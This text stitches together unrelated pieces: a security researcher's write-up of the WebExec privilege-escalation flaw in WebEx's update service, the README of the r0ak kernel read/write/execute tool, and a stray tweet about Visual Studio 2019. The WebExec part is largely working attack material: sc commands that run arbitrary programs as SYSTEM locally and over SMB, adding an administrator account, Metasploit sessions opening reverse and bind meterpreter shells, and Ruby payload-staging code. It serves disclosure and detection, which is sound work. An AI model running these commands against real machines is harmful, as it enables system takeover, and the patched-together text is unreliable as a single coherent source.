What initially got our attention is that the folder (c:\ProgramData\WebEx\WebEx\Applications\) is readable and writable by everyone, and it installs a service called «webexservice» that can be started and stopped by anybody. That’s not good! It is trivial to replace the .exe or an associated .dll with anything we like and get code execution at the service level (that’s SYSTEM). That’s an immediate vulnerability, which we reported, and which ZDI apparently beat us to the punch on, since it was fixed on September 5, 2018, based on their report.
Due to the application whitelisting, however, on this particular assessment we couldn’t simply replace this with a shell! The service starts non-interactively (ie, no window and no commandline arguments). We explored a lot of different options, such as replacing the .exe with other binaries (such as cmd.exe), but no GUI meant no ability to run commands.
One test that almost worked was replacing the .exe with another whitelisted application, msbuild.exe, which can read arbitrary C# commands out of a .vbproj file in the same directory. But because it’s a service, it runs with the working directory c:\windows\system32, and we couldn’t write to that folder!
At that point, my curiosity got the best of me, and I decided to look into what webexservice.exe actually does under the hood. The deep dive ended up finding gold! Let’s take a look.
Deep dive into WebExService.exe
It’s not really a good motto, but when in doubt, I tend to open something in IDA. The two easiest ways to figure out what a process does in IDA is the strings windows (shift-F12) and the imports window. In the case of webexservice.exe, most of the strings were related to Windows service stuff, but something caught my eye:
.rdata:00405438 ; wchar_t aSCreateprocess
.rdata:00405438 aSCreateprocess: ; DATA XREF: sub_4025A0+1E8o
.rdata:00405438 unicode 0, <%s::CreateProcessAsUser:%d;%ls;%ls(%d).>,0
I found the import for CreateProcessAsUserW in advapi32.dll, and looked at how it was called:
.text:0040254E push [ebp+lpProcessInformation] ; lpProcessInformation
.text:00402554 push [ebp+lpStartupInfo] ; lpStartupInfo
.text:0040255A push 0 ; lpCurrentDirectory
.text:0040255C push 0 ; lpEnvironment
.text:0040255E push 0 ; dwCreationFlags
.text:00402560 push 0 ; bInheritHandles
.text:00402562 push 0 ; lpThreadAttributes
.text:00402564 push 0 ; lpProcessAttributes
.text:00402566 push [ebp+lpCommandLine] ; lpCommandLine
.text:0040256C push 0 ; lpApplicationName
.text:0040256E push [ebp+phNewToken] ; hToken
.text:00402574 call ds:CreateProcessAsUserW
The W on the end refers to the UNICODE («wide») version of the function. When developing Windows code, developers typically use CreateProcessAsUser in their code, and the compiler expands it to CreateProcessAsUserA for ASCII, and CreateProcessAsUserW for UNICODE. If you look up the function definition for CreateProcessAsUser, you’ll find everything you need to know.
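For reference, the generic name is just a preprocessor macro in the Windows headers; roughly speaking, winbase.h does something like this (a simplified sketch for illustration, not WebEx code):

#ifdef UNICODE
#define CreateProcessAsUser  CreateProcessAsUserW   /* wide (UTF-16) strings */
#else
#define CreateProcessAsUser  CreateProcessAsUserA   /* ANSI strings */
#endif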
In any case, the two most important arguments here are hToken — the user it creates the process as — and lpCommandLine — the command that it actually runs. Let’s take a look at each!
hToken
The code behind hToken is actually pretty simple. If we scroll up in the same function that calls CreateProcessAsUserW, we can just look at API calls to get a feel for what’s going on. Trying to understand what code’s doing simply based on the sequence of API calls tends to work fairly well in Windows applications, as you’ll see shortly.
At the top of the function, we see:
.text:0040241E call ds:CreateToolhelp32Snapshot
This is a normal way to search for a specific process in Win32 — it creates a «snapshot» of the running processes and then typically walks through them using Process32FirstW and Process32NextW until it finds the one it needs. I even used the exact same technique a long time ago when I wrote my Injector tool for loading a custom .dll into another process (sorry for the bad code.. I wrote it like 15 years ago).
Based simply on knowledge of the APIs, we can deduce that it’s searching for a specific process. If we keep scrolling down, we can find a call to _wcsicmp, which is a Microsoft way of saying stricmp for UNICODE strings:
.text:00402480 lea eax, [ebp+Str1]
.text:00402486 push offset Str2 ; "winlogon.exe"
.text:0040248B push eax ; Str1
.text:0040248C call ds:_wcsicmp
.text:00402492 add esp, 8
.text:00402495 test eax, eax
.text:00402497 jnz short loc_4024BE
Specifically, it’s comparing the name of each process to «winlogon.exe» — so it’s trying to get a handle to the «winlogon.exe» process!
If we continue down the function, you’ll see that it calls OpenProcess, then OpenProcessToken, then DuplicateTokenEx. That’s another common sequence of API calls — it’s how a process can get a handle to another process’s token. Shortly after, the token it duplicates is passed to CreateProcessAsUserW as hToken.
To summarize: this function gets a handle to winlogon.exe, duplicates its token, and creates a new process as the same user (SYSTEM). Now all we need to do is figure out what the process is!
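To make that recovered flow concrete, here is a minimal standalone C sketch of the same API sequence (my own illustration, not WebEx’s code; error handling is omitted, and it only works when the caller, like the service, already runs with privileges sufficient to assign a SYSTEM token):

#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>

int main(void)
{
    /* 1. Snapshot the process list and walk it until we find winlogon.exe */
    DWORD pid = 0;
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32W pe;
    pe.dwSize = sizeof(pe);
    if (Process32FirstW(snap, &pe)) {
        do {
            if (_wcsicmp(pe.szExeFile, L"winlogon.exe") == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32NextW(snap, &pe));
    }
    CloseHandle(snap);
    if (pid == 0) return 1;

    /* 2. Open the process, grab its token, and duplicate it as a primary token */
    HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
    HANDLE token = NULL, dup = NULL;
    OpenProcessToken(proc, TOKEN_DUPLICATE | TOKEN_QUERY, &token);
    DuplicateTokenEx(token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation,
                     TokenPrimary, &dup);

    /* 3. The duplicated SYSTEM token becomes hToken; lpCommandLine is whatever we run */
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    si.lpDesktop = L"winsta0\\Default";   /* same desktop string we'll see later in the binary */
    wchar_t cmd[] = L"cmd.exe";
    CreateProcessAsUserW(dup, NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
    return 0;
}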
An interesting takeaway here is that I didn’t really read assembly at all to determine any of this: I simply followed the API calls. Often, reversing Windows applications is just that easy!
lpCommandLine
This is where things get a little more complicated, since there are a series of function calls to traverse to figure out lpCommandLine. I had to use a combination of reversing, debugging, troubleshooting, and eventlogs to figure out exactly where lpCommandLine comes from. This took a good full day, so don’t be discouraged by this quick summary — I’m skipping an awful lot of dead ends and validation to keep just to the interesting bits.
One such dead end: I initially started by working backwards from CreateProcessAsUserW, or forwards from main(), but I quickly became lost in the weeds and decided that I’d have to go the other route. While scrolling around, however, I noticed a lot of debug strings and calls to the event log. That gave me an idea — I opened the Windows event viewer (eventvwr.msc) and tried to start the process with sc start webexservice:
C:\Users\ron>sc start webexservice

SERVICE_NAME: webexservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
[...]
You may need to configure Event Viewer to show everything in the Application logs, I didn’t really know what I was doing, but eventually I found a log entry for WebExService.exe:
ExecuteServiceCommand::Not enough command line arguments to execute a service command.
That’s handy! Let’s search for that in IDA (alt+T)! That leads us to this code:
.text:004027DC cmp edi, 3
.text:004027DF jge short loc_4027FD
.text:004027E1 push offset aExecuteservice ; "ExecuteServiceCommand"
.text:004027E6 push offset aSNotEnoughComm ; "%s::Not enough command line arguments t"...
.text:004027EB push 2 ; wType
.text:004027ED call sub_401770
A tiny bit of actual reversing: compare edi to 3, jump if greater or equal, otherwise print that we need more commandline arguments. It doesn’t take a huge logical leap to determine that we need 2 or more commandline arguments (since the name of the process is always counted as well). Let’s try it:
C:\Users\ron>sc start webexservice a b [...]
Then check Event Viewer again:
ExecuteServiceCommand::Service command not recognized: b.
Don’t you love verbose error messages? It’s like we don’t even have to think! Once again, search for that string in IDA (alt+T) and we find ourselves here:
.text:00402830 loc_402830: ; CODE XREF: sub_4027D0+3Dj
.text:00402830 push dword ptr [esi+8]
.text:00402833 push offset aExecuteservice ; "ExecuteServiceCommand"
.text:00402838 push offset aSServiceComman ; "%s::Service command not recognized: %ls"...
.text:0040283D push 2 ; wType
.text:0040283F call sub_401770
If we scroll up just a bit to determine how we get to that error message, we find this:
.text:004027FD loc_4027FD: ; CODE XREF: sub_4027D0+Fj
.text:004027FD push offset aSoftwareUpdate ; "software-update"
.text:00402802 push dword ptr [esi+8] ; lpString1
.text:00402805 call ds:lstrcmpiW
.text:0040280B test eax, eax
.text:0040280D jnz short loc_402830 ; <-- Jumps to the error we saw
.text:0040280F mov [ebp+var_4], eax
.text:00402812 lea edx, [esi+0Ch]
.text:00402815 lea eax, [ebp+var_4]
.text:00402818 push eax
.text:00402819 push ecx
.text:0040281A lea ecx, [edi-3]
.text:0040281D call sub_4025A0
The string software-update is what the argument is compared to. So instead of b, let’s try software-update and see if that gets us further! I want to once again point out that we’re only doing an absolutely minimal amount of reverse engineering at the assembly level; we’re basically working entirely from API calls and error messages!
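Putting the two error paths together, the dispatcher we have deduced so far behaves roughly like the following C sketch (all names are invented for illustration; this is a reconstruction, not decompiled WebEx code):

#include <windows.h>

/* Invented stand-ins for the service's logging routine and for sub_4025A0 */
static void LogEvent(const wchar_t *fmt, ...) { (void)fmt; /* writes to the Application event log */ }
static void StartUpdateProcess(int argc, wchar_t **argv) { (void)argc; (void)argv; /* the CreateProcessAsUserW path */ }

static void ExecuteServiceCommand(int argc, wchar_t **argv)
{
    if (argc < 3) {                                        /* cmp edi, 3 / jge */
        LogEvent(L"ExecuteServiceCommand::Not enough command line arguments "
                 L"to execute a service command.");
        return;
    }
    if (lstrcmpiW(argv[2], L"software-update") == 0) {     /* call ds:lstrcmpiW */
        StartUpdateProcess(argc - 3, &argv[3]);            /* lea ecx, [edi-3] ... call sub_4025A0 */
    } else {
        LogEvent(L"ExecuteServiceCommand::Service command not recognized: %ls.",
                 argv[2]);
    }
}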
Here’s our new command:
C:\Users\ron>sc start webexservice a software-update [...]
Which results in the new log entry:
Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
Faulting module name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
Exception code: 0xc0000005
Fault offset: 0x00002643
Faulting process id: 0x654
Faulting application start time: 0x01d42dbbf2bcc9b8
Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
Faulting module path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
Report Id: 31555e60-99af-11e8-8391-0800271677bd
Uh oh! I’m normally excited when I get a process to crash, but this time I’m actually trying to use its features! What do we do!?
First of all, we can look at the exception code: 0xc0000005. If you Google it, or develop low-level software, you’ll know that it’s a memory fault. The process tried to access a bad memory address (likely NULL, though I never verified).
The first thing I tried was the brute-force approach: let’s add more commandline arguments! My logic was that it might require 2 arguments, but actually use the third and onwards for something then crash when they aren’t present.
So I started the service with the following commandline:
C:\Users\ron>sc start webexservice a software-update a b c d e f [...]
That led to a new crash, so progress!
Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f7ce6
Exception code: 0x40000015
Fault offset: 0x000a7676
Faulting process id: 0x774
Faulting application start time: 0x01d42dbc22eef30e
Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
Faulting module path: C:\ProgramData\Webex\Webex\Applications\MSVCR120.dll
Report Id: 60a0439c-99af-11e8-8391-0800271677bd
I had to google 0x40000015; it means STATUS_FATAL_APP_EXIT. In other words, the app exited, but hard — probably a failed assert()? We don’t really have any output, so it’s hard to say.
This one took me a while, and this is where I’ll skip the dead ends and debugging and show you what worked.
Basically, keep following the codepath immediately after the software-update string we saw earlier. Not too far after, you’ll see this function call:
.text:0040281D call sub_4025A0
If you jump into that function (double click), and scroll down a bit, you’ll see:
.text:00402616 mov [esp+0B4h+var_70], offset aWinsta0Default ; "winsta0\\Default"
I used the most advanced technique in my arsenal here and googled that string. It turns out that it’s a handle to the default desktop and is frequently used when starting a new process that needs to interact with the user. That’s a great sign, it means we’re almost there!
A little bit after, in the same function, we see this code:
.text:004026A2 push eax ; EndPtr
.text:004026A3 push esi ; Str
.text:004026A4 call ds:wcstod ; <--
.text:004026AA add esp, 8
.text:004026AD fstp [esp+0B4h+var_90]
.text:004026B1 cmp esi, [esp+0B4h+EndPtr+4]
.text:004026B5 jnz short loc_4026C2
.text:004026B7 push offset aInvalidStodArg ; "invalid stod argument"
.text:004026BC call ds:?_Xinvalid_argument@std@@YAXPBD@Z ; std::_Xinvalid_argument(char const *)
The line with the error, the wcstod() call, is close to where the abort() happened. I’ll spare you the debugging details (debugging a service was non-trivial), but I really should have seen that function call before I got off track.
I looked up wcstod() online, and it’s another of Microsoft’s cleverly named functions. This one converts a string to a number. If it fails, the code references something called std::_Xinvalid_argument. I don’t know exactly what it does from there, but we can assume that it’s looking for a number somewhere.
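For illustration, here is roughly what that check looks like in C (my sketch of the std::stod-style pattern visible in the assembly above, not the actual WebEx source):

#include <stdlib.h>
#include <wchar.h>

static double parse_numeric_arg(const wchar_t *arg)
{
    wchar_t *end = NULL;
    double value = wcstod(arg, &end);   /* parse a number, remember where parsing stopped */
    if (end == arg) {
        /* Nothing was consumed: this mirrors the cmp/jnz path that pushes
         * "invalid stod argument" and calls std::_Xinvalid_argument, which,
         * unhandled inside a service, likely ends up as the hard exit we observed. */
        abort();
    }
    return value;
}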
This is where my advice becomes «be lucky». The reason is, the only number that will actually work here is «1». I don’t know why, or what other numbers do, but I ended up calling the service with the commandline:
C:\Users\ron>sc start webexservice a software-update 1 2 3 4 5 6
And checked the event log:
StartUpdateProcess::CreateProcessAsUser:1;1;2 3 4 5 6(18).
That looks awfully promising! I changed 2 to an actual process:
C:\Users\ron>sc start webexservice a software-update 1 calc c d e f
And it opened!
C:\Users\ron>tasklist | find "calc"
calc.exe                      1476 Console                    1     10,804 K
It actually runs with a GUI, too, so that’s kind of unnecessary. I could literally see it! And it’s running as SYSTEM!
Speaking of unknowns, running cmd.exe and powershell the same way does not appear to work. We can, however, run wmic.exe and net.exe, so we have some choices!
Local exploit
The simplest exploit is to start cmd.exe with wmic.exe:
C:\Users\ron>sc start webexservice a software-update 1 wmic process call create "cmd.exe"
That opens a GUI cmd.exe instance as SYSTEM:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
If we can’t or choose not to open a GUI, we can also escalate privileges:
C:\Users\ron>net localgroup administrators
[...]
Administrator
ron

C:\Users\ron>sc start webexservice a software-update 1 net localgroup administrators testuser /add
[...]

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron
testuser
And this all works as an unprivileged user!
Jeff wrote a local module for Metasploit to exploit the privilege escalation vulnerability. If you have a non-SYSTEM session on the affected machine, you can use it to gain a SYSTEM account:
meterpreter > getuid
Server username: IEWIN7\IEUser

meterpreter > background
[*] Backgrounding session 2...

msf exploit(multi/handler) > use exploit/windows/local/webexec
msf exploit(windows/local/webexec) > set SESSION 2
SESSION => 2
msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/webexec) > set LHOST 172.16.222.1
msf exploit(windows/local/webexec) > set LPORT 9001
msf exploit(windows/local/webexec) > run

[*] Started reverse TCP handler on 172.16.222.1:9001
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\yqaKLvdn.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to 172.16.222.132
[*] Meterpreter session 2 opened (172.16.222.1:9001 -> 172.16.222.132:49574) at 2018-08-31 14:45:25 -0700
[*] Service started...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Remote exploit
We actually spent over a week knowing about this vulnerability without realizing that it could be used remotely! The simplest exploit can still be done with the Windows sc command. Either create a session to the remote machine or create a local user with the same credentials, then run cmd.exe in the context of that user (runas /user:newuser cmd.exe). Once that’s done, you can use the exact same command against the remote host:
c:\>sc \\10.0.0.0 start webexservice a software-update 1 net localgroup administrators testuser /add
The command will run (and a GUI will even pop up!) on the other machine.
Remote exploitation with Metasploit
To simplify this attack, I wrote a pair of Metasploit modules. One is an auxiliary module that implements this attack to run an arbitrary command remotely, and the other is a full exploit module. Both require a valid SMB account (local or domain), and both mostly depend on the WebExec library that I wrote.
Here is an example of using the auxiliary module to run calc on a bunch of vulnerable machines:
msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS 192.168.1.100-110
RHOSTS => 192.168.56.100-110
msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser
SMBUser => testuser
msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser
SMBPass => testuser
msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc
COMMAND => calc
msf5 auxiliary(admin/smb/webexec_command) > exploit

[-] 192.168.56.105:445 - No service handle retrieved
[+] 192.168.56.105:445 - Command completed!
[-] 192.168.56.103:445 - No service handle retrieved
[+] 192.168.56.103:445 - Command completed!
[+] 192.168.56.104:445 - Command completed!
[+] 192.168.56.101:445 - Command completed!
[*] 192.168.56.100-110:445 - Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
And here’s the full exploit module:
msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set SMBUser testuser
SMBUser => testuser
msf5 exploit(windows/smb/webexec) > set SMBPass testuser
SMBPass => testuser
msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/webexec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(windows/smb/webexec) > exploit

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Authenticating to 192.168.56.101:445 as user 'testuser'...
[*] 192.168.56.101:445 - Command Stager progress - 0.96% done (999/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress - 1.91% done (1998/104435 bytes)
...
[*] 192.168.56.101:445 - Command Stager progress - 98.52% done (102891/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress - 99.47% done (103880/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Sending stage (179779 bytes) to 192.168.56.101
The actual implementation is mostly straightforward if you look at the code linked above, but I wanted to specifically talk about the exploit module, since it had an interesting problem: how do you get a meterpreter .exe uploaded initially in order to execute it?
I started with a psexec-like approach, where we upload the .exe file to a writable share and then execute it via WebExec. That proved problematic, because uploading to a share frequently requires administrator privileges, and at that point you could simply use psexec instead. You lose the magic of WebExec!
After some discussion with Egyp7, I realized I could use the Msf::Exploit::CmdStager mixin to stage the command to an .exe file to the filesystem. Using the .vbs flavor of staging, it would write a Base64-encoded file to the disk, then a .vbs stub to decode and execute it!
There are several problems, however:
- The max line length is ~1200 characters, whereas the CmdStager mixin uses ~2000 characters per line
- CmdStager uses %TEMP% as a temporary directory, but our exploit doesn’t expand paths
- WebExecService seems to escape quotation marks with a backslash, and I’m not sure how to turn that off
The first two issues could be simply worked around by adding options (once I’d figured out the options to use):
wexec(true) do |opts|
  opts[:flavor] = :vbs
  opts[:linemax] = datastore["MAX_LINE_LENGTH"]
  opts[:temp] = datastore["TMPDIR"]
  opts[:delay] = 0.05
  execute_cmdstager(opts)
end
execute_cmdstager() will execute execute_command() over and over to build the payload on-disk, which is where we fix the final issue:
# This is the callback for cmdstager, which breaks the full command into
# chunks and sends it our way. We have to do a bit of finangling to make it
# work correctly
def execute_command(command, opts)
  # Replace the empty string, "", with a workaround - the first 0 characters of "A"
  command = command.gsub('""', 'mid(Chr(65), 1, 0)')

  # Replace quoted strings with Chr(XX) versions, in a naive way
  command = command.gsub(/"[^"]*"/) do |capture|
    capture.gsub(/"/, "").chars.map do |c|
      "Chr(#{c.ord})"
    end.join('+')
  end

  # Prepend "cmd /c" so we can use a redirect
  command = "cmd /c " + command

  execute_single_command(command, opts)
end
First, it replaces the empty string, "", with mid(Chr(65), 1, 0), which works out to the first 0 characters of the string «A», i.e. the empty string!
Second, it replaces every other string with Chr(n)+Chr(n)+.... We couldn’t use &, because that’s already used by the shell to chain commands. I later learned that we can escape it and use ^&, which works just fine, but + is shorter so I stuck with that.
And finally, we prepend cmd /c to the command, which lets us echo to a file instead of just passing the > symbol to the process. We could probably use ^> instead.
In a targeted attack, it’s obviously possible to do this much more cleanly, but this seems to be a great way to do it generically!
Checking for the patch
This is one of those rare (or maybe not so rare?) instances where exploiting the vulnerability is actually easier than checking for it!
The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it’s being asked to run an executable that is not signed by WebEx, the execution will halt. Unfortunately, that gives us no information about whether a host is vulnerable!
There are a lot of targeted ways we could validate whether code was run. We could use a DNS request, telnet back to a specific port, drop a file in the webroot, etc. The problem is that unless we have a generic way to check, it’s no good as a script!
In order to exploit this, you have to be able to get a handle to the service-control service (svcctl), so to write a checker, I decided to install a fake service, try to start it, then delete the service. If starting that fake service returns either of two particular error codes (as opposed to an error saying the service does not exist), we know it worked!
Here’s the important code from the Nmap checker module we developed:
-- Create a test service that we can query
local webexec_command = "sc create " .. test_service .. " binpath= c:\\fakepath.exe"
status, result = msrpc.svcctl_startservicew(smbstate, open_service_result['handle'], stdnse.strsplit(" ", "install software-update 1 " .. webexec_command))

-- ...

local test_status, test_result = msrpc.svcctl_openservicew(smbstate, open_result['handle'], test_service, 0x00000)

-- If the service DOES_NOT_EXIST, we couldn't run code
if string.match(test_result, 'DOES_NOT_EXIST') then
  stdnse.debug("Result: Test service does not exist: probably not vulnerable")
  msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])
  vuln.check_results = "Could not execute code via WebExService"
  return report:make_output(vuln)
end
Not shown: we also delete the service once we’re finished.
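Assuming the checker is saved as smb-vuln-webexec.nse (the script name is presumed here, and the credentials are placeholders), running it would look something like:

nmap -p445 --script smb-vuln-webexec --script-args smbusername=testuser,smbpassword=testuser 192.168.56.101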
Conclusion
So there you have it! Escalating privileges from zero to SYSTEM using WebEx’s built-in update service! Local and remote! Check out webexec.org for tools and usage instructions!
R0Ak (The Ring 0 Army Knife) — A Command Line Utility To Read/Write/Execute Ring Zero on Windows 10 Systems
Quick Peek
r0ak v1.0.0 -- Ring 0 Army Knife
<a class="vglnk" href="http://www.github.com/ionescu007/r0ak" rel="nofollow">http://www.github.com/ionescu007/r0ak</a>
Copyright (c) 2018 Alex Ionescu [@aionescu]
<a class="vglnk" href="http://www.windows-internals.com/" rel="nofollow">http://www.windows-internals.com</a>
USAGE: r0ak.exe
[--execute <Address | module.ext!function> <Argument>]
[--write <Address | module.ext!function> <Value>]
[--read <Address | module.ext!function> <Size>]
Introduction
Motivation
The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands of variables containing global state are present. For advanced troubleshooting, IT experts will typically use tools such as the Windows Debugger (WinDbg), SysInternals Tools, or write their own. Unfortunately, usage of these tools is getting increasingly hard, and they are themselves limited by their own access to Windows APIs and exposed features.
Some of today’s challenges include:
- Windows 8 and later support Secure Boot, which prevents kernel debugging (including local debugging) and loading of test-signed driver code. This restricts troubleshooting tools to those that have a signed kernel-mode driver.
- Even on systems without Secure Boot enabled, enabling local debugging or changing boot options which ease debugging capabilities will often trigger BitLocker’s recovery mode.
- Windows 10 Anniversary Update and later include much stricter driver signature requirements, which now enforce Microsoft EV Attestation Signing. This restricts the freedom of software developers, as generic "read-write-everything" drivers are frowned upon.
- Windows 10 Spring Update now includes customer-facing options for enabling HyperVisor Code Integrity (HVCI), which further restricts allowable drivers and blacklists multiple 3rd party drivers that had "read-write-everything" capabilities due to poorly written interfaces and security risks.
- Technologies like Supervisor Mode Execution Prevention (SMEP), Kernel Control Flow Guard (KCFG) and HVCI with Second Level Address Translation (SLAT) are making traditional Ring 0 execution 'tricks' obsolete, so a new approach is needed.
In such an environment, it was clear that a simple tool which can be used as an emergency band-aid/hotfix and to quickly troubleshoot kernel/system-level issues which may be apparent by analyzing kernel state might be valuable for the community.
How it Works
Basic Architecture
r0ak works by redirecting the execution flow of the window manager's trusted font validation checks when attempting to load a new font, replacing the trusted font table's comparator routine with an alternate function which schedules an executive work item (WORK_QUEUE_ITEM) stored in the input node. Then, the trusted font table's right child (which serves as the root node) is overwritten with a named pipe's write buffer in which a custom work item is stored. This item's underlying worker function and its parameter are what will eventually be executed by a dedicated system worker thread at PASSIVE_LEVEL once a font load is attempted and the comparator routine executes, receiving the named-pipe-backed parent node as its input. A real-time Event Tracing for Windows (ETW) trace event is used to receive an asynchronous notification that the work item has finished executing, which makes it safe to tear down the structures, free the kernel-mode buffers, and restore normal operation.
Supported Commands
When using the --execute option, this function and parameter are supplied by the user.
When using --write, a custom gadget is used to modify arbitrary 32-bit values anywhere in kernel memory.
When using --read, the write gadget is used to modify the system's HSTI buffer pointer and size (N.B.: This is destructive behavior in terms of any other applications that will request the HSTI data. As this is optional Windows behavior, and this tool is meant for emergency debugging/experimentation, this loss of data was considered acceptable). Then, the HSTI Query API is used to copy the data back into the tool's user-mode address space, and a hex dump is shown.
Because only built-in, Microsoft-signed Windows functionality is used, and all called functions are part of the KCFG bitmap, there is no violation of any security checks, and no debugging flags or poorly written 3rd party drivers are required.
FAQ
Is this a bug/vulnerability in Windows?
No. Since this tool — and the underlying technique — require a SYSTEM-level privileged token, which can only be obtained by a user running under the Administrator account, no security boundaries are being bypassed in order to achieve the effect. The behavior and utility of the tool is only possible due to the elevated/privileged security context of the Administrator account on Windows, and is understood to be a by-design behavior.
Was Microsoft notified about this behavior?
Of course! It’s important to always file security issues with Microsoft even when no violation of privileged boundaries seems to have occurred — their teams of researchers and developers might find novel vectors and ways to reach certain code paths which an external researcher may not have thought of.
As such, in November 2014, a security case was filed with the Microsoft Security Response Center (MSRC), which responded: "[…] doesn't fall into the scope of a security issue we would address via our traditional Security Bulletin vehicle. It […] pre-supposes admin privileges — a place where architecturally, we do not currently define a defensible security boundary. As such, we won't be pursuing this to fix."
Furthermore, in April 2015 at the Infiltrate conference, a talk titled Insection: AWEsomely Exploiting Shared Memory Objects was presented detailing this issue, including to Microsoft developers in attendance, who agreed this was currently out of scope of Windows's architectural security boundaries. This is because there are literally dozens — if not more — of other ways an Administrator can read/write/execute Ring 0 memory. This tool merely allows an easy commodification of one such vector, for purposes of debugging and troubleshooting system issues.
Can’t this be packaged up as part of an end-to-end attack/exploit kit?
Packaging this code up as a library would require carefully removing all interactive command-line parsing and standard output, at which point, without major rewrites, the ‘kit’ would:
- Require the target machine to be running Windows 10 Anniversary Update x64 or later
- Have already elevated privileges to SYSTEM
- Require an active Internet connection with a proxy/firewall allowing access to Microsoft’s Symbol Server
- Require the Windows SDK/WDK installed on the target machine
- Require a sensible _NT_SYMBOL_PATH environment variable to have been configured on the target machine, and for about 15MB of symbol data to be downloaded and cached as PDB files somewhere on the disk
Attackers interested in using this particular approach — versus the many other, more cross-compatible techniques that don't require SYSTEM rights — have likely already adapted their own code based on the Proof-of-Concept from April 2015, more than 3 years ago.
Usage
Requirements
Due to the usage of the Windows Symbol Engine, you must have either the Windows Software Development Kit (SDK) or Windows Driver Kit (WDK) installed with the Debugging Tools for Windows. The tool will look up your installation path automatically and leverage the DbgHelp.dll and SymSrv.dll that are present in that directory. As these files are not re-distributable, they cannot be included with the release of the tool.
Alternatively, if you obtain these libraries on your own, you can modify the source-code to use them.
Usage of symbols requires an Internet connection, unless you have pre-cached them locally. Additionally, you should set up the _NT_SYMBOL_PATH environment variable to point to an appropriate symbol server and cache location.
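For example, a typical value pointing at the public Microsoft symbol server with a local cache (the cache directory here is just an example) is:

set _NT_SYMBOL_PATH=srv*C:\Symbols*https://msdl.microsoft.com/download/symbols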
It is assumed that an IT expert or other troubleshooter who apparently has a need to read/write/execute kernel memory (and has knowledge of the appropriate kernel variables to access) is already more than intimately familiar with the above setup requirements. Please do not file issues asking what the SDK is or how to set an environment variable.
Use Cases
- Some driver leaked kernel pool? Why not call ntoskrnl.exe!ExFreePool and pass in the kernel address that’s leaking? What about an object reference? Go call ntoskrnl.exe!ObfDereferenceObject and have that cleaned up.
- Want to dump the kernel DbgPrint log? Why not dump the internal circular buffer at ntoskrnl.exe!KdPrintCircularBuffer?
- Wondering how big the kernel stacks are on your machine? Try looking at ntoskrnl.exe!KeKernelStackSize
- Want to dump the system call table to look for hooks? Go print out ntoskrnl.exe!KiServiceTable
These are only a few examples — all Ring 0 addresses are accepted, either by module.ext!function syntax or by directly passing the kernel pointer if known. The Windows Symbol Engine is used to look these up.
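As a rough illustration of that syntax (the sizes and the kernel address below are placeholders, not values from the original write-up), the use cases above would map to invocations like:

r0ak.exe --read ntoskrnl.exe!KdPrintCircularBuffer 0x1000
r0ak.exe --read ntoskrnl.exe!KeKernelStackSize 4
r0ak.exe --read ntoskrnl.exe!KiServiceTable 0x1000
r0ak.exe --execute ntoskrnl.exe!ExFreePool 0xFFFFC380A1B2C000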
Limitations
The tool requires certain kernel variables and functions that are only known to exist in modern versions of Windows 10, and was only meant to work on 64-bit systems. These limitations are due to the fact that on older systems (or x86 systems), these stricter security requirements don’t exist, and as such, more traditional approaches can be used instead. This is a personal tool which I am making available, and I had no need for these older systems, where I could use a simple driver instead. That being said, this repository accepts pull requests, if anyone is interested in porting it.
Secondly, due to the use cases and my own needs, the following restrictions apply:
- Reads — Limited to 4 GB of data at a time
- Writes — Limited to 32-bits of data at a time
- Executes — Limited to functions which only take 1 scalar parameter
Obviously, these limitations could be fixed by programmatically choosing a different approach, but they fit the needs of a command line tool and my use cases. Again, pull requests are accepted if others wish to contribute their own additions.
Note that all execution (including execution of the --read and --write commands) occurs in the context of a System Worker Thread at PASSIVE_LEVEL. Therefore, user-mode addresses should not be passed in as parameters/arguments.
Visual Studio 2019
alright since its the weekend, hope nobody is watching, you can get an early version of Visual Studio 2019 here https://t.co/aCKX6HhyWP
channel — https://t.co/kUX13gca5H
